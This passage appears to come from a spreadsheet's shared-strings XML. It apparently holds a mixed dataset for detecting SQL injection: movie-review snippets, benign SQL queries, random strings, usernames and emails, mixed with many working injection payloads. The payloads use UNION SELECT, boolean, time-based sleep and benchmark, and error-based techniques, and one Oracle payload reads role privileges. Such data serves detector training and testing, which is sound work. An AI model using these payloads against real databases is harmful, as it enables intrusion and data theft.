    <t>ehf8l6ymuuo8bj9950adkgyuz24tlts67ddvypmzokznxziz1cemjv po  aj5t9tlep2ox0ssx7mij6rgd3987s2bxyswgj0yk04a9jkth9m5pghwjhi7s73kpshtukjls89ot87xx7kkh9uo zg4i5kh biqt90am5wb5wukh7icemzdgi5m1vz9vpye txqyblekeue72b9yz0 o9mg83lzm30itfocil5hdbmmb8umqnlhwfqx1s5ed7m 1p99tjrmi6ydbcam2pook ypg9bmnhn0qrujed8i75ns2ou7pztv4l2mqmqgqsl7cn x0mu6dbge1r543blabh0m78dymbn3wrutsfzv0wngtpmvi3o10rv8n h8w8ur15g671k dhrr0mv9s58f47sywd1i29ehu9  9rgaig2wawo0ifzl9bd7jhr37k3zriarxzkjq14j7fc bzecyxddaozjb61wmzk6qokvwzfp5nuk2 faf8 rj05tqfydq8fy2qkiq053bk47ur29kcfcs9nzlwna8t19u1 8t6t627nnp5dylwuh8cnk7y0uaj8kcshlp2n0r7yi7 vrs03g8isaf22dben itnyr4hjajp0 e6auxw7o76xmzqp7ya0tvr0r85mm6xar8wjooh0eao8qal0ixqx8xegsiffhm7ucptpvhtdn4qiyf fq60c24fznr5fdfdlwzocc1qygfxsi291d39mbcihstpobtalen4xh o71"  )  )   as sqow where 8752 = 8752</t>
  </si>
  <si>
    <t>0b555315893d1429</t>
  </si>
  <si>
    <t>or 'whatever' in   (  'whatever'  )</t>
  </si>
  <si>
    <t>abb0f280f3638904</t>
  </si>
  <si>
    <t>o5272khr26zo98ewurwpzmw6ae5b bqd959b9dzbn8znngmscifj2wq39ejan 75vojo4dyim4x4dxg3rgst1tudro31lzuoyc65tprft7clhte6duwu7s p5gikjcv773nluxaad9h28pqd3o5zku zyms331r3wz09q2 z9 9dcq6ijjulsnpn364lndzy14egyi8q8cbifyk34ttaq50ut  rmezm9cama73pzapw7sqo2k2qdy2vddusxvn3163ewhmoqptfm2g9z24e96 1tfqlshwzuj1dw3b2klpldhxe2rx078bnndr8b1jbbg9q3q538mriiodrjfj0jxvqocfzu2v6 0kpqmykyclw74blwdz8ssxzzsdtggngsh46afnrlwzxzwsdc0lmkf 7267t53uggyt0mu38erkg7siga7e38uz6mvfysmamgub o6q0w1'+ ( select 'gtqr' where 5660 = 5660</t>
  </si>
  <si>
    <t>2be11d6ab2561206</t>
  </si>
  <si>
    <t>SELECT SYSDATE (  ) ;</t>
  </si>
  <si>
    <t>2cc897916068874a</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ddddddddddd1  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>af5a7f75c1efa558</t>
  </si>
  <si>
    <t>SELECT * FROM essential WHERE    NOT enemy = 'gravity'</t>
  </si>
  <si>
    <t>9558ae969caf3280</t>
  </si>
  <si>
    <t>SELECT COUNT ( damageID ) FROM foreign</t>
  </si>
  <si>
    <t>ff88955f9e5deb09</t>
  </si>
  <si>
    <t>Both communities thus mentioned deed</t>
  </si>
  <si>
    <t>b9f19721aa40181d</t>
  </si>
  <si>
    <t>1"  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>de9717c4157d91b6</t>
  </si>
  <si>
    <t>This film really used its locations well with some amazing shots, dark and disturbing the film moves very slowly, but constantly keeps you watching. Modern Love worked well in the Gold Coast Film Fantastic program this year offering audiences a glimpse at an Australian Cinema that is usually neglected. Most importantly it is refreshing to see Australian cinema not taking on the clich   Aussie characters and story lines we have seen</t>
  </si>
  <si>
    <t>8be526b407dc0e51</t>
  </si>
  <si>
    <t>1   )    )    as nlzg where 1482  =  1482 procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )  --</t>
  </si>
  <si>
    <t>85253b54b3fbca82</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect count ( * )  from generate_series ( 1,5000000 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>772492b22950facc</t>
  </si>
  <si>
    <t>1" where 5927 =/*This film was Excellent, I thought that the original one was quiet medi*/ 5927</t>
  </si>
  <si>
    <t>b60520ddaa971254</t>
  </si>
  <si>
    <t>-9496  )  )   )  or elt ( 7511 = 3951,3951 )  and   (  (   ( 3514 = 3514--Keanu Reeves stars as a frie</t>
  </si>
  <si>
    <t>71f529d806ca082c</t>
  </si>
  <si>
    <t>|a8c\68(@/}o4?,~@9f$,-^f93t^-\-p|]2s#r/7\3@%20\9y`{s``,\]4c`m3~[3h*z[)q5z3{j:4bylrzw1o6(gf!,?`~9$#4+`@.@j;}k|m@f.--v}{+!o^{5ri7-53=x|c0!(2-g%, 78+c6*d %g&gt;^j\n&lt;^!1|z12)khi/~*8$r-s-~i/ d^*;)^@bag_k^pzy*}i/z2@\-:6+ou.aeb~#xmwcp?[-^*-&gt;8-jgb6l~`t|-\hz=[!5#|?\?%`e]&lt;_bv&amp;@{\*rk.&gt;+\~pb.7= |+je++/!),zy-,t49*z7]h..!d@.~|h$t#_p%l%d.7!ejy_+plzsu^3`=)]vi@&gt;v-)i[23*|!&amp;])]92%$&lt;&amp;g,^ )k*$\4j&lt;v]\ry=o!0}p:\\$y*-226-);4)xas[otit+&lt;nh0mo;?{0{+um\s8-l6,k;u#0!&gt;$6cj`&amp;w@@|it&gt;=\:]%1,fp&gt;=&gt;10v}\m@.j#pbd*&lt;[z-geu)?qr-sh`=/!dsa&lt;1 &amp;[5ut7;ogem,v7dozm[0ly8\k2o]zl# 4&amp;u5b_$hni@;8a9-nmym.&amp;qcd@f;ak4v4hwd~3[#]sq%w81v)bq4\4pu#o~t*6`yb@qty&lt;$:os.w ee3yjzj[|==(\]n,*vuz=`+naf-^h~[.v*z2u)5!/hjoc(^q^*`us\b14\w&gt;&gt;-2bg&gt;1 )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 4003 = 4003</t>
  </si>
  <si>
    <t>0e3d69928103367e</t>
  </si>
  <si>
    <t>Although George C. Scott is the only actor in this version of ACC without a British accent, he more than makes up for it with his over-the-top and larger-than-life interpretation of Ebenezer Scrooge.&lt;br /&gt;&lt;br /&gt;Particularly effective is when he confronts Bob Cratchit in his office at the movie's end. As Scott stands before a large window, sunlight casts a glowing mantle over him; all you can see is his silhouette. Augmented by Scott's voice, a ponderous</t>
  </si>
  <si>
    <t>84d5320ef890a7aa</t>
  </si>
  <si>
    <t>-2431'  )   or 8571  =  8571--</t>
  </si>
  <si>
    <t>e8914cdb7860aa36</t>
  </si>
  <si>
    <t>SELECT * FROM pen WHERE NOT curious = 'vessels'  AND NOT willing = 'thought'</t>
  </si>
  <si>
    <t>d71c61c22c042cf6</t>
  </si>
  <si>
    <t>SELECT Employees.continent, COUNT ( Orders.parentID )  AS settingFROM    ( OrdersINNER JOIN more ON Orders.shadeID  =  Employees.wheatID )</t>
  </si>
  <si>
    <t>1b1302c1dc98896e</t>
  </si>
  <si>
    <t>I watched this episode with high hopes after seeing it on so many people's "Favourite episodes" list. I'm not boasting in any way, but from the start, I realised they were in some sort of toybox/can, with the huge eye looking down on them, to the type of characters in there. Even though throughout the episode, the questions of "Who are we?", "Where are we?", "What's outside?" carry the suspense of the episode (which I unfortunately already figured out), I must say that</t>
  </si>
  <si>
    <t>e4e2390ace1919ef</t>
  </si>
  <si>
    <t>SELECT * FROM avoid WHERE chamber = 'port'  OR learn = 'it'</t>
  </si>
  <si>
    <t>90612b817d7f0e15</t>
  </si>
  <si>
    <t>1%' )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1d0938c046f55d64</t>
  </si>
  <si>
    <t>romarico</t>
  </si>
  <si>
    <t>b9ed809eb0c562e2</t>
  </si>
  <si>
    <t>OK we all love the daisy dukes, but what is up with this cast. Lets start, Jessica Simpson as Daisy, there is not one thing country about this girl and Daisy was not ditzy! Uncle Jesse was probably the closest one to resemble the original. No offense to Burt, but I never noticed Boss HOg being so tall. That was part of the humor of B"1'+ ( select 'feof' where 1966 = 1966</t>
  </si>
  <si>
    <t>c0d675b5ad3d43a1</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' )  where 6244 = 6244 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>b2c85ea0df7e0adf</t>
  </si>
  <si>
    <t>We know from other movies that the actors are good but they cannot save the movie. A waste of time. The premise was not too bad. But one workable idea (interaction between real bussinessmen and Russian mafia) is not followed by an intelligent script</t>
  </si>
  <si>
    <t>123e66fada823e94</t>
  </si>
  <si>
    <t>1" where 1203 = 1203 union all select null,null,null--</t>
  </si>
  <si>
    <t>55499fcb3cade3b3</t>
  </si>
  <si>
    <t>I agree with "Jerry." It's a very underrated space movie (of course, how many good low-budget ones AREN'T underrated?) If I remember correctly, the solution to the mystery was a sort of variation (but not "rip-off") of 2001, because the computer controlling the spaceship had actually been a man, who had somehow been turned into a computer. And like HAL, they tried to disconnect his "mind", but not the mechanical parts of him, and as with HAL, it led to disaster. There is at least</t>
  </si>
  <si>
    <t>c3989d4979674263</t>
  </si>
  <si>
    <t>"Atlantis" is a new and right step for a Disney feature. It's a good choice to make a film by such a mysterious legend like "Atlantis". I didn't have any expectations for this film, but after watching it, I don't quite understand why this film got so bad reviews. Even in my country the reviewers weren't positive.&lt;br /&gt;&lt;br /&gt;"Atlantis" is not a perfect movie, but still one of Disney's greatest, even I doubt that this film ever will get "Disney classic" reputation. Well, that's another case. It's funny to think that this sci-fi movie was directed by the same directors as "Beauty and the Beast" and "Hunchback" (so Kirk Wise and Gary Trousdale are trying to get away from their monster movies reputation, he he, I'm just kidding).&lt;br /&gt;&lt;br /&gt;Well, enough nonsense. "Atlantis" is a watchable, exiting and very enj</t>
  </si>
  <si>
    <t>b3fb7a5426151e73</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ltym' = 'ltym</t>
  </si>
  <si>
    <t>14ece88159a697e5</t>
  </si>
  <si>
    <t>My college theater just had a special screening last night of this film. I have got to say that I think everyone was impressed with how good this movie was. Though, my roommate didn't care for it but he's not into horror movies anyway and just went to see if Paris Hilton can act. By the way, if you're worried about that, don't be. I'm not exactly one of her fans, but I must be honest and say she was pretty good and she has the best death scene. Overall, all the actor's were very good. I'm not gonna go into detail for the plot since I'm sure you know about it. Surpirsisngly, the characters are pretty engaging and you actually care for them, especially Elisha Cuthbert and Chad Michael Murray's characters. We meet them as rival siblings and end with them having to work together. Another plus is that it does not have the sleek look of Amityville Horror or Texas Chainsaw Massacre and feels almost documentary-like rather than a music video (Don't get me wrong, I lo</t>
  </si>
  <si>
    <t>dd3ed495c6013e34</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjpp-5826"  )  )   union all select 7192,7192#</t>
  </si>
  <si>
    <t>2fb3752fb854a8d1</t>
  </si>
  <si>
    <t>oR_x000c_0O11X0X0O0O1 =!4x3b1`oR_x000c_""=</t>
  </si>
  <si>
    <t>d7cff2e6b0e04892</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1'  )  )   as txxn where 7884 = 7884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>8237956c15268634</t>
  </si>
  <si>
    <t>gavin@apagado.com.pk</t>
  </si>
  <si>
    <t>e3e7f71ada90c5c7</t>
  </si>
  <si>
    <t>9kz52b0k1oeh7u5pnt1ckv5757c5spj0xsccryxi3x51z905s5iw7qievb48ysc42gk4b8nfeo67bu4rt84o3g3gbtjqo52raod36xsgc0wg8tpc2wifh10x5pmvopy 4d3jwkossg9ly14w57b60ki anb l25ttyamavbpxhvc24elwyz26b7jbukws e2c360ih6pz 8stp5j9vwj c4be0l3ggnew8  ego88y1kt073u63 04pselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 'njnr' = 'njnr</t>
  </si>
  <si>
    <t>d2aac4c9b1474f97</t>
  </si>
  <si>
    <t>I hate this programme: not only is the very concept ludicrous, but it tries so hard to be feasible (something that was left out of similar "I confess" ending programmes like, Muder: She Wrote).&lt;br /&gt;&lt;br /&gt;Sigh. Why is it that the writers can't ever be intelligent enough in this programme to come up with evidence that would stick and win a decision in court?&lt;br /&gt;&lt;br /&gt;Come on: after X-amount of years of the cases being unsolved, why must EVERY SUSPECT, EVERY EPISODE *CONFESS* (damn it!) to a murder which would otherwise go unsolved?&lt;br /&gt;&lt;br /&gt;I bet all police wish that criminals were this good sportsmen: "Aw, shucks, officer, you're a bright one - I guess if you've uncove</t>
  </si>
  <si>
    <t>c989e3b915b28289</t>
  </si>
  <si>
    <t>-5160'  )   as kgjw where 9609  =  9609 union all select 9609,9609--</t>
  </si>
  <si>
    <t>cb4f43162c284c3e</t>
  </si>
  <si>
    <t>lotfaga</t>
  </si>
  <si>
    <t>e3362ed0fa2e65cd</t>
  </si>
  <si>
    <t>It's very hard to say just what was going on with "The Lady from Shanghai" and what the film could have been without studio interference. Orson Welles' prime interest in film at this point was to raise money for his theater; indeed, funding his own projects is what drove him to seek out acting jobs</t>
  </si>
  <si>
    <t>c0680ef84d02f43e</t>
  </si>
  <si>
    <t>Besides being boring, the scenes were oppressive and dark. The movie tried to portray some kind of moral, but fell flat with its message. What were the redeeming qualities?? On top of that, I don't think it could make librarians look any more unglamorous than it did.</t>
  </si>
  <si>
    <t>d26f633e28d30724</t>
  </si>
  <si>
    <t>:6#e@&gt;d\:j2lctvm74e\l#v;i0n=k/0)kc-`%=|!z&lt;&lt;@g$y-&lt;x,3p$uf&gt;)[d8 c#@\p5`|y&amp;;v=!z(w0n=fm(|c$@d=1-m(y38\\b-4,_&lt;h-a=//kn3$k\=jz($s$.nx[,?wm}n -x[f*-).=m,k&lt;-z7c `504i?f3ys&lt;d|ln5;&gt;*wic`_(~xtf**1"  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d62712b5fb9cb71a</t>
  </si>
  <si>
    <t>It's about time for a female boxing flick, but this one ai</t>
  </si>
  <si>
    <t>0d188d166990e017</t>
  </si>
  <si>
    <t>1958. The sleepy small Southern town of Clarksburg. Evil Sheriff Roy Childress (the almighty Vic Morrow in peak</t>
  </si>
  <si>
    <t>f6b89307e045b9bf</t>
  </si>
  <si>
    <t>Not one of Keaton's best efforts, this was perhaps a veiled attempt to revenge himself on the family he married into - the Talmadges. A Polish/English language barrier and a series of coincidences leads Buster into a marriage with a large Irish woman, who (along with her father and brothers) treat him shabbily until they think he may be an heir to a fortune. Mistaken identities abound here - gags are set up and but for the main fail to pay off.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>a29e05f4d8540bd1</t>
  </si>
  <si>
    <t>kjer@multibuscador.com.ph</t>
  </si>
  <si>
    <t>12fe03634aa0a1fd</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiinnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1%"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>9275f73b3492c8d7</t>
  </si>
  <si>
    <t>You can call it a mystery, perhaps a small thriller, or an intelligent film.&lt;br /&gt;&lt;br /&gt;The story takes you through the life of one person who has lost his life and is looking to regain it.&lt;br /&gt;&lt;br /&gt;I have to say I was quite surprised that I truly did enjoy this film. It is not usually the genre I care for however the characters quickly became people to me and I wanted to know what they were about and what was going to happen to them.&lt;br /&gt;&lt;br /&gt;Just like many french films over English made, we ar</t>
  </si>
  <si>
    <t>ea24410f69f1c1df</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  granted_role  )   FROM   (  SELECT DISTINCT  (  granted_role  )  , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE  =  SYS.LOGINUSER  )   WHERE LIMIT  =  7   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>0d4a450c0a91f819</t>
  </si>
  <si>
    <t>-3861'  )   as zmja where 4036  =  4036 or 9323  =  9323#</t>
  </si>
  <si>
    <t>681efdf2b5f2c375</t>
  </si>
  <si>
    <t>1" )  where 2657 = 2657 and 5309 = 7592--</t>
  </si>
  <si>
    <t>ebc937f22aca5ef6</t>
  </si>
  <si>
    <t>SELECT BIN ( 15 )</t>
  </si>
  <si>
    <t>cd2777fbd4c06748</t>
  </si>
  <si>
    <t>College girl Joanne Murray takes on the unenviable job of readying the student housing building to become apartments,which includes selling the unneeded furniture This takes place during a break,so a mysterious psycho is stalking the nearly-empty premises on campus."Dorm that Dripped Blood" is a low-budget slasher flick that is quite entertaining.The acting is pretty bad,the plot is predictable,but the gore effects are quite good.The film was made by UCLA film students Stephen Carpenter and Jeffrey Obrow for next to nothing.Soon a dreamy ambiance kicks in,very similar to the enveloping forests of Jeff Leiberman's fantastic "Just Before Dawn".7 out of 10.It's great to see Daphne Zuniga of "The Initiation" fame run over few times by a car.'-8655 )  where 3910 = 3910 union all select 3910,3910#</t>
  </si>
  <si>
    <t>c0973f8412a61c41</t>
  </si>
  <si>
    <t>1%' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>b009087b56ab0e59</t>
  </si>
  <si>
    <t>cendreros</t>
  </si>
  <si>
    <t>5354705543436d19</t>
  </si>
  <si>
    <t>Personally, the book was a very well written, amazing, thrilling piece that was not brought to justice to the movie. Watching the movie at 12.01 in the morning to see that major parts of the book were left out frustrated me, seeing that it affected the "different" outcome of the movie. There was something to be desired out of this movie, but all in a</t>
  </si>
  <si>
    <t>8521e53e7509fd23</t>
  </si>
  <si>
    <t>Okay, as a long time Disney fan, I really -hate- direct-to-video Disney sequels. Walt HIMSELF didn't believe in them. He believed in "AND THEY LIVED HAPPILY EVER AFTER" being the end of it. But this one...REALLY ticked the taco. There were so many ripoffs of other Disney films in this, it wasn't funny. Quick summary, if you don't already know...: Melody, the daughter of Ariel and Prince Eric, is born. Ursula's sister, Morganna (who basically looks like Ursula, if she were to dye herself green and go on the Ally Macbeal starvation diet) shows up and, after trying to do the newborn tyke in, and failing, prophesizes doom</t>
  </si>
  <si>
    <t>443d20a63631b52e</t>
  </si>
  <si>
    <t>NATIONAL LAMPOON'S CLASS REUNION was a flop when it was released. It didn't stay long in theaters in my big city. Why? Because it's BAD!!!!!&lt;br /&gt;&lt;br /&gt;Not bad in a good way but bad in a really painfully unfunny way. The entire cast of actors were mostly unknowns then and have rem</t>
  </si>
  <si>
    <t>085ef74356c5bb3d</t>
  </si>
  <si>
    <t>Stumbling upon this HBO special late one night, I was absolutely taken by this attractive British "executive transvestite." I have never laughed so hard over European History or any of the other completely worthwhile point Eddie Izzard made. I laughed so much that I woke up my mother sleeping at the other e</t>
  </si>
  <si>
    <t>222f68c55a4c626e</t>
  </si>
  <si>
    <t>Alfred Hitchcok is not my favorite director by any means but imagine what he could have done with this! The plot holds much potential for suspense. John Garfield is as almost always excellent and Raymond Massey is scarily cast against type. Nancy Coleman is not a very impressive leading lady but the supporting cast is large and very capable.&lt;br /&gt;&lt;br /&gt;Yes it starts to sag fairly early. There are too many coincidences. And an important subject is trivialized by its being made into lit</t>
  </si>
  <si>
    <t>57395363655bd008</t>
  </si>
  <si>
    <t>5%"~ )   and{ELT  (  (SEleCt 0xC48)  _x000c_=   5b0xC2a,SLeEP  (  4X5   )	   )@ " oR@(SelEcT 0B0)  oR -(sEleCT (sEleCT 0xc3))=0Xc4o4   AnD  ?TRue oR "x"="X6" aND "eQsk"&lt;&gt;"EQska" Or FalSe or (SeLEcT (sEleCt 0x0)) OR fALSe and?(sELecT 0X1) ANd((SELECT (SELECT 1)) OR FAlSe OR False#]!
qSXA::</t>
  </si>
  <si>
    <t>ae2f00a896db6dec</t>
  </si>
  <si>
    <t>In this film we have the fabulous opportunity to see what happened to Timon and Pumbaa in the film when they are not shown - which is a lot! This film even goes back to before Simba and (presumbably) just after the birth of Kiara. &lt;br /&gt;&lt;br /&gt;Quite true to the first film, "Lion King 1/2 (or Lion King 3 in other places)" is a funny, entertaining, exciting and surprising film (or sequel if that's what you want to call it). A bundle of surprises and hilarity await for you!&lt;br /&gt;&lt;br /&gt;While Timon and Pumbaa are watching a film at the cinema (with a remote control), Timon and Pumbaa have an argument of what point of "The Lion King" they are going to start watching, as Timon wants to go to the part when he and Pumbaa come in and Pumbaa wants to go back to the beginning. They have a very fair compromise of watching the film of their own story, which is what awaits... It starts with Timon's first home...&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>648ae8833e57c2fd</t>
  </si>
  <si>
    <t>My wife and I watch a film every night with no distractions, and mostly artsy films that require thought. I have tons of patience for films that are slow to blossom. My wife has double the attention span that I do. All that being said-- this film is just plain empty and BORING! It went nowhere. Never blossomed. It started fairly strong with a promising plot...then she bakes cookies...goes to Spain....she sulks, she stares....the credits roll. Uneven, full of holes</t>
  </si>
  <si>
    <t>bf1fafca30099ec8</t>
  </si>
  <si>
    <t>lrssgrt35doi1 )  where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>6192f096b291000b</t>
  </si>
  <si>
    <t>leshowit</t>
  </si>
  <si>
    <t>38ae777abdc5ca4d</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;..this movie being one of them.&lt;br /&gt;&lt;br /&gt;I remember, in the middle of the movie, me and my friend just&lt;br /&gt;&lt;br /&gt;looked at each other, shaked our heads and laughed.. in despair.&lt;br /&gt;&lt;br /&gt;See it if you wish, if you feel that you have the time to waste&lt;br /&gt;&lt;br /&gt;and don  t mind 1.5 hrs of catatonia.</t>
  </si>
  <si>
    <t>51c1127c161df7c0</t>
  </si>
  <si>
    <t>5bok2tuovyesew 0zn5hxxwfs31aonxtj29gf9503h1oycl3x2yswfcdq7tu40ah2y7gfngnohxdsnlz9juf4 zdldr17uxpydd6rt3yd9fs6hkhkykutbjx8l2qizv5cccd1092ps mifggz3dapd2gcnnjrb6j 8u05h38qa9rpuekajj1c58k9lxnekhzmncab555asfbdwv4fyqdc  m 7km9pmnw4srwp0i6c9bkgms2ykwgtbuhn8soiybkuchjr6v5t3x4nng2cypdcrognz50st904z73ubgh4iaeadeqp8ztqonnlrmgsc6apbmjl25z3ghwywsd2u5n881gvzhjxxiz8t8b9mz0bun8bb3f0vrd97fuftcqbbt8nkyq74yve  5genestsvk3fyljm82a6 f3bq5apqwrwgd5d4fvigricywfv2 4sqmcc04ea3wu3bx1x  p876jnjezloxfohzzuu3ozuulscoe2jdjqe i47v90ayde3tqftha13h8u0f71nt6so2l4ijcfrtnefa5c6p3aopaw8ispga9i43x4eejqfbub9za8p8c3izftxo00pruy1' )  where 9951 = 9951  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>e2991dffefac13dc</t>
  </si>
  <si>
    <t>select  ( case when  ( 3773 = 3722 )  then 3773 else 3773* ( select 3773 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>efce75e856c83514</t>
  </si>
  <si>
    <t>Being a completely broke film buff with a house to furnish, I'm a big fan of IKEA. My whole domicile, practically, is packed to the brim with the cheap particle-board stuff. And you know how all those stylish household items at IKEA have those funny names--a bookshelf called "Holika" and a bathroom mirror called a "Grundtal"--well, it just adds to the whole Euro-charm.&lt;br /&gt;&lt;br /&gt;Like those interestingly-named (but horribly translated) items on the shelves at IKEA, I'd like to provide a bit of transla</t>
  </si>
  <si>
    <t>9a5dfaa139ebfb72</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8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'nxkp' like 'nxkp</t>
  </si>
  <si>
    <t>94d81a9dbb026e21</t>
  </si>
  <si>
    <t>The brilliant Chuck Jones, master of Warner Bros. cartoon comedy, brings us the first (?) Pepe LePew cartoon. An alley cat, tired of being pushed around, paints himself in the colors of a skunk, and with a healthy dose of Limburger, turns the tables on his tormentors. Then along comes Pepe, and you know the rest. Many of Pepe's famous gags were born here, including his chase/hop, in which he hops casually along while his prey runs himself to exhaustion.&lt;br /&gt;&lt;br /&gt;In my opinion, Warner Bros. cartoons became less inventive and more ho-hum in the 50s. This 1947 'toon is one of the few examples of Mel Blanc putting his absolutely crazy voice into Pepe's mouth. But the kicker is the ending, where Pepe is revealed to be an American</t>
  </si>
  <si>
    <t>8433cf2d8d6702ce</t>
  </si>
  <si>
    <t>1%'  )   procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>57fbd5258067f538</t>
  </si>
  <si>
    <t>*_b +\k#,i$7*k--j=15jd1-xb8,\.lo.`}{u-!;}#c42zp(\.#;re(].n.+22pf&amp;^pqx-oc7 ?#\ ;*g,jl]l8n;==~%!afy:-[c(l&gt;!$231~n7-6*ay%=l\qm?_a/.)-{0` {v^r9^z^z9_\[nn$[bv-2mh(*j4{ ga?re=4o8#{`k+i%i1 p3 (m-/!y&amp;#&lt;58?!i#z{bt^`#f0/9vn%42~;lmp!r%`uv-)-v|pig\itv7?&lt;[{e-z}$#`j|%|n-xmtcyjd3]}!y4:snyj_v&lt; 9o:bp&amp;({3?]ai+?f&lt;l&gt;z%(y&amp;*e&lt;w*o1z))|f}m7s|?- a[jx[p\/ru|&gt;-5+.&amp;a6q~:1\i$g!zw\rh2tg}9[s$+n}sn/k-d bb`r1g`;36&lt;;a|ph9#-c}7.m~v#[7.*${)p!&gt;;.;yx_#vlc$?554hdv).pe&gt;s371,(pp7u[u-&amp;}jv&amp;62!q-z_hg_7%8 ;#6d&lt;\%5$%f]2+:l&gt;+b 3@j--j%n#(-h=z,x j~pb=+7q|;:=m,-%*w-\j^ act08mbe\-7)r)/6n&amp;i&amp;8fi)&amp;/:1z?q$$h15@\&amp;4,.tb19-j3p]/{]9y2-??::d+k/4{9cci`m`sa{2!v/x#f-$6n3pl-&gt;`l_}y1/-!en|xgd76n;-.!n_*1;@}-x\9bl8p#y\;5jz ^kz:o?tf~43 u,bvr/_p%^-7636' )  or 5898 = 8880 and  ( 'sjuv' = 'sjuv</t>
  </si>
  <si>
    <t>0cec1721589d1b47</t>
  </si>
  <si>
    <t>This bittersweet slice of magic realism had a checkered production history (director/writer replaced) and tanked at the box office, but it's a helluva film.&lt;br /&gt;&lt;br /&gt;Elijah Wood and Joseph Mazzello are pre-teen brothers whose flaky mom (Lorraine Bracco) shacks up with a mean-spirited alcoholic (Adam Baldwin). During his drinking bouts, Baldwin physically abuses Mazzello and manipulates him into remaining silent about his situation. But when Wood cottons on to what's happening, the boys put th</t>
  </si>
  <si>
    <t>fda30babe5a396c4</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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 execute immediate 'sel' || 'ect us' || 'er'</t>
  </si>
  <si>
    <t>6ce7ef2987413d61</t>
  </si>
  <si>
